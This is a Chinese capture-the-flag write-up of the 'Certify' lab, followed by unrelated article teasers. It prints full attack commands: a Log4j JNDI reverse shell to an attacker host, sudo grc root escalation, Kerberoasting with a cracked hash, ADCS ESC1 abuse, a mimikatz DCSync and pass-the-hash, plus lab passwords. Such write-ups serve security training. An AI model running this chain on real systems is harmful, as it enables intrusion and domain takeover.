春秋云镜 Certify Writeup

article/2025/6/7 13:48:14

在这里插入图片描述


端口扫描发现8983端口存在 Solr 服务

在这里插入图片描述
在这里插入图片描述

这个版本可以直接打 Log4j

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFza.....}|{base64,-d}|{bash,-i}" -A "x.x.x.x"

在这里插入图片描述
访问触发:

http://39.98.113.203:8983/solr/admin/cores?action=${jndi:ldap://x.x.x.x:1389/rzik2y}

在这里插入图片描述

sudo -l发现具有 root 权限的 grc命令

在这里插入图片描述

sudo grc --pty /bin/bash -i

grc(Generic Colouriser)是一个为命令行输出添加颜色的工具,可通过预设的配置文件对如 pingnetstattraceroute 等命令的输出进行语法高亮,使终端显示更清晰易读,便于用户快速识别关键信息。它常用于运维、网络调试和日志分析中,也可自定义配置规则以支持更多命令。通过简单的封装,grc 提高了命令行工作效率,是提升可视化体验的实用辅助工具。

利用grc获取root权限

在这里插入图片描述
在这里插入图片描述
获得 flag01

上传frpfscan等工具,内网信息收集

start infoscan
(icmp) Target 172.22.9.19     is alive
(icmp) Target 172.22.9.7      is alive
(icmp) Target 172.22.9.47     is alive
(icmp) Target 172.22.9.26     is alive
[*] Icmp alive hosts len is: 4
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:445 open
172.22.9.26:139 open
172.22.9.47:139 open
172.22.9.7:139 open
172.22.9.26:135 open
172.22.9.7:135 open
172.22.9.7:80 open
172.22.9.47:80 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.19:8983 open
172.22.9.7:88 open
[*] alive ports len is: 16
start vulscan
[*] WebTitle http://172.22.9.19        code:200 len:612    title:Welcome to nginx!
[*] NetInfo 
[*]172.22.9.7[->]XIAORANG-DC[->]172.22.9.7
[*] NetInfo 
[*]172.22.9.26[->]DESKTOP-CBKTVMO[->]172.22.9.26
[*] WebTitle http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios 172.22.9.7      [+] DC:XIAORANG\XIAORANG-DC    
[*] NetBios 172.22.9.47     fileserver                          Windows 6.1
[*] OsInfo 172.22.9.47  (Windows 6.1)
[*] NetBios 172.22.9.26     DESKTOP-CBKTVMO.xiaorang.lab        �Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.9.19:8983   code:302 len:0      title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle http://172.22.9.7         code:200 len:703    title:IIS Windows Server
[+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect 
[*] WebTitle http://172.22.9.19:8983/solr/ code:200 len:16555  title:Solr Admin

尝试匿名登录SMB(172.22.9.47),发现存在匿名分享目录

在这里插入图片描述
在这里插入图片描述

得到 flag02

下载其他文件,personnel.db

在这里插入图片描述
在这里插入图片描述

以及Certified_Pre-Owned.pdf

在这里插入图片描述

利用数据库备份文件获取到的 用户名 和 密码 在内网爆破一波

在这里插入图片描述
得到两个账户

[3389][rdp] account on 172.22.9.26 might be valid but account not active for remote desktop: login: zhangjian password: i9XDE02pLVf, continuing attacking the account.
[3389][rdp] account on 172.22.9.26 might be valid but account not active for remote desktop: login: liupeng password: fiAzGwEMgTY, continuing attacking the account.

利用得到的账号密码,获取用户 SPN(Service Principal Name) 服务票据

python .\examples\GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf -request

在这里插入图片描述

可直接利用hashcat爆破

.\hashcat.exe -m 13100 '$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$2ba8031d66342c8128da9ed0d1e35eeb$4f42ad786cce197f0558260987f56b4b6ccfefee58551b1dce70d41b570801f1b6db05fa747c81e439e079c75bf1c0a296bd535064ce88b285baee5d295785f32e111f2a74214c1ed581be82ffe72968ac1fea9252e1e7694e8b8848e24d58d08caf70b2c4e09824129dba839f2b90c782874f9a0cf730a5e62bc800a355269e84b411ae6938c094303ab3bab637479b800ca2f9b24df6796635b44258ca14f3a9c3ff0ef27f987fdb6166534882ed97d06e41ab83d5e31b0ec2cac277b31d32a072bf7e9b49b18d1fa2dd8ba80f0d97af9a8fbaa58cb4cce415a847a241c546dc6b884284987244d788d020c738773e0da0d5ba625fb34b24eb1cb4b09570666a8f0d78014d8118179e5edd094c486498f80c02e01ca2302ebb67d21f49caae6abae7581d3cc45a600b2c32aa5128452a594a08edef3159dcec8f8622e566630cada5c534c7efb94abd2af3a6685bd5b004024959ff9638f5e236ca0d808537118e163a3d5e9ce9d0bf889e606d4221baa80eb2ded0f72406ce27a895cf74f18d261523202762dbe644dfad4d5b21a82c2890563ed38f4c64ead376fde457b4c0d859dae989af8e68cdc5091d8d3034812676d67bf3d0b47dd279acc2b138c36165952d388572667c0090b9fa4bb94b2cfe66bf1a0bf477bdbe507c2ed99968efd1eabc0c990e05b6908ec40f82a936130e39018e160ad40e51c1cf851f29491b555665eb499a437ea3c4d77d6c5432e741e2402c4ec7f3808976eb36edd9b30e07da2b6e5e88189bbc3a4fecaafb6a5b5102b5ffd32cee3096f9de8c597b28ff6f23b02e830767bc484ae45562fe0ebb70485342cc2429fbf235da8ae96f4e1b412e8760f311678373353d89684f45bc97ed5ec6a096afb3578f0163aec36d94c288e496b38c9b31a80d277bcca92bcbc9ebe8fa70d716672f62edcadd628adcc1a78cd5dfceaa5de5ea43b990150b074d81745e4ce4018479e92566a1dcee9af253ede995a31db5f42b40e48fd8882004f3ca40392793f1fc9314cfed68a98f87bf2ce0f468c5dc22339907f373a5a761a3b62bbb950b4df83c791cb99aaedd9d7bd0c98ced04758061a9d930b03ad57d78e886248087d714f8b8dc04b5a431fca717832e8a1865512bfe0a2fa770f4a033ac8019362cf3249c723d09c7b58a2d4e53916ecb9a71a6caf0ff153fd42829edff83b3bb13080c1feb92542363657ee937520d1fe4e973785e500e636e87ffe7cc28fa10bdfe384f4d97a58be371a3c5dde0d8fcba88ae0ae78380e98ab44d31f51d6f37dd90662d90f1670fabbc8a0929e7fff98303dfbd93e6015a2ae2f96c2607059912e21e1addfffe5beb1967acda1964fbab13358bdc64432ef3fad6eab97884f596c3e709f3935542bde4a972f98ffe7c2c9a31da3434fd7b619eb8d8d12d5926e85fb5bbb0fd771ceef223ffbe789c2495f6ad0d8dbf80a96ea66657ea08220285af5a4333314b32c45c04d0c01753adc0b7e0ad5e3422' D:\Tools\Penet\Dictionary\rockyou.txt --force

在这里插入图片描述

得到账号密码:

chenchen@xiaorang.lab:@Passw0rd@
zhangxia@xiaorang.lab:MyPass2@@6

利用 zhangxia@xiaorang.lab 远程登录

在这里插入图片描述

然后就是需要利用 Certified_Pre-Owned.pdf 文章中提到的 Misconfigured Certificate Templates - ESC1 (证书模板配置错误) 来进行域内权限提升。

ADCS攻击之证书模板配置错误 ESC1:https://blog.csdn.net/Adminxe/article/details/129353293

  • https://github.com/GhostPack/Certify

查找可利用证书:

Certify.exe find /vulnerable

在这里插入图片描述

发现存在漏洞,为域管请求证书

Certify.exe request /ca:XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA /template:"XR Manager" /altname:xiaorang\Administrator

在这里插入图片描述

转换证书格式,不输入密码,生成pfx证书

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

在这里插入图片描述
然后 Rebeus 请求 TGT、PTT

  • Rebeus: https://github.com/GhostPack/Rubeus
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password: /ptt

在这里插入图片描述

然后mimikatz进行DCSync导出域控哈希

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

在这里插入图片描述

最后就可以直接利用wmiexec PTH

python .\examples\wmiexec.py XIAORANG.LAB/administrator@172.22.9.26 -hashes ':2f1b57eefb2d152196836b0516abea80'

在这里插入图片描述
在这里插入图片描述
获得 flag03

最后一个flag在域控上

python .\examples\wmiexec.py XIAORANG.LAB/administrator@172.22.9.7 -hashes ':2f1b57eefb2d152196836b0516abea80'

在这里插入图片描述
在这里插入图片描述


http://www.hkcw.cn/article/rpRyYnwSRN.shtml

相关文章

JavaSec | H2数据库注入学习

目录: 前言 前置学习 介绍 环境搭建 demo 漏洞分析 RCE Alias Script RCE INIT RunScript RCE TRIGGER Script RCE 高版本JDK下的RCE 文件读取 写文件 JDBC JNDI 内存马 例题 [N1CTF Junior 2025]EasyDB 参考 前言 在学 Spring 框架的利用时发现很多用的是用的 H2 数据库…

IP查询与网络风险的关系

网络风险场景与IP查询的关联 网络攻击、恶意行为、数据泄露等风险事件频发,而IP地址作为网络设备的唯一标识,承载着关键线索。例如,在DDoS恶意行为中,攻击者利用大量IP地址发起流量洪泛;恶意行为通过变换IP地址绕过封…

深度学习入门Day2--鱼书学习(1)

前言:《深度学习入门,基于python的理论与实现》是非常好的一本书,封面有一条鱼。 作者是斋藤康毅,东京工业大学毕业,并完成东京大学研究生院课程。现从事计算机视觉与机器学习相关的研究和开发工作。 本系列为该书的学…

windows安装和部署docker

Docker 是一种开源的容器化平台,允许开发者将应用程序及其依赖打包成轻量级的容器进行部署。 安装部署参考文章链接:https://blog.csdn.net/weixin_57972634/article/details/147032466 启用虚拟化功能 官网下载docker 官网下载docker地址&#xff1a…

Windows【基础操作2】

目录 前言: 一、Windows用户 二、用户分类和管理 1.用户分类 2.用户管理 总结: 前言: 回顾上一篇windows 我讲了关于磁盘的知识 小萌新们都明白了吗? 没明白的可以评论告诉我 我会的话会为你们解答的 好 话不多说 下面是…

unity UI Rect Transform“高”性能写法

🎯 Unity UI 性能优化终极指南 — RectTransform篇 🧩 RectTransform 是什么? Unity UI中每一个UI元素的必备组件继承自 Transform,但专门用于 2D 布局负责定义UI的位置、大小、锚点、旋转、缩放 ⚠️ 特别注意:所有…

登录vmware vcenter报vSphere Client service has stopped working错误

一、问题 登录vmware vcenter时发现报vSphere Client service has stopped working错误,导致vcenter控制台进不去 二、解决办法 打开vmware vcenter管理https://vcenterIP:5480,选择VMware vSphere Client,重启该服务后恢复正常。

MicroPython+ESP32 连接接WIFI

在使用ESP32连接热点前,需要先使用手机或者电脑打开一个热点,并设置为2.4频段G的,如下图所示。 ESP32连接wifi热点官方示例 import networkwlan network.WLAN() # create station interface (the default, see below for an access p…

算法题(160):64位整数除法

审题: 本题需要我们计算出数量级巨大的(a*b)%p的值,其中a,b,p的数据类型都是longlong 思路: 方法一:暴力解法 我们可以直接计算a*b的结果,然后再取余p。但是由于他们的数量级过高,计算时空间可能会溢出&…

在图像分析算法部署中应对流行趋势的变化|文献速递-深度学习医疗AI最新文献

Title 题目 Navigating prevalence shifts in image analysis algorithm deployment 在图像分析算法部署中应对流行趋势的变化 01 文献速递介绍 机器学习(ML)已开始革新成像研究与实践的诸多领域。然而,医学图像分析领域存在显著的转化鸿…

RTP over TCP 模式

RTP over TCP 模式概述 RTP over TCP 指的是将RTP数据包封装在TCP连接中进行传输,而不是使用传统的基于UDP的传输方式。 与UDP模式对比 特性RTP over TCPRTP over UDP端口数量仅需 1 个 TCP 端口(默认 554)每路流需 2 个 UDP 端口&#xf…

智启未来:AI重构制造业供应链的五大革命性突破

一、需求预测:让供应链“未卜先知” 1.1 从经验判断到数据预言 传统供应链依赖人工分析历史数据,但面对市场波动、设备突发故障等不确定性,往往反应滞后。AI通过整合工业物联网(IIoT)传感器数据、生产排程、供应商交…

【文献精读】Explaining grokking through circuit efficiency

abstract 神经网络泛化中最神奇的现象之一是grokking:一个具有完美训练accuracy但泛化能力差的网络,在进一步的训练后,会过渡到完美的泛化。 本文提出,当任务存在一个泛化解和一个记忆解时,就会发生泛化。其中泛化解学…

JVM简介

JAVA内存模型 以下是关于 Java内存模型(JMM) 的核心要点总结: 一、JMM的核心作用 Java内存模型是 **多线程环境下内存访问的规范**,主要解决以下问题: 可见性:线程对共享变量的修改对其他线程立即可见&am…

蓝桥杯 k倍区间

题目描述 给定一个长度为 N 的数列,A1,A2,⋯AN,如果其中一段连续的子序列 Ai,Ai1,⋯Aj ( i≤j ) 之和是 K 的倍数,我们就称这个区间 [i,j] 是 K 倍区间。 你能求出数列中总共有多少个 K 倍区间吗? 输入描述 第一行包含两个整数…

linux批量创建文件

文章目录 批量创建空文件touch命令批量创建空文件循环结构创建 创建含内容文件echo重定向多行内容写入 按日期创建日志文件根据文件中的列内容,创建文件一行只有一列内容一行有多列内容 批量创建空文件 touch命令批量创建空文件 # 创建文件file1.txt到file10.txt …

[蓝桥杯]高僧斗法

高僧斗法 题目描述 古时丧葬活动中经常请高僧做法事。仪式结束后,有时会有"高僧斗法"的趣味节目,以舒缓压抑的气氛。 节目大略步骤为:先用粮食(一般是稻米)在地上"画"出若干级台阶(…

C++语法系列之类型转换

前言 类型转换是经常存在的情况,类型转换分为隐式类型转化 和 显式类型转化 隐式类型转化:编译器在编译阶段自动进行,能转就转,不能转就编译失败 double i 3.3; int b i; //隐式类型转化 double -> intC搞出来了四种强制类…

Python----循环神经网络(BiLSTM:双向长短时记忆网络)

一、LSTM 与 BiLSTM对比 1.1、LSTM LSTM(长短期记忆网络) 是一种改进的循环神经网络(RNN),专门解决传统RNN难以学习长期依赖的问题。它通过遗忘门、输入门和输出门来控制信息的流动,保留重要信息并丢弃无关…

工作自动化——工作自动提炼--智能编程——仙盟创梦IDE

工作自动化中的自动提炼、自动比对代码生成日志,为软件开发与项目管理带来诸多好处。 自动提炼能从复杂代码中精准提取关键信息,节省人工梳理时间,开发人员可快速把握核心逻辑,加速项目熟悉进程。自动比对代码则及时发现版本间差异…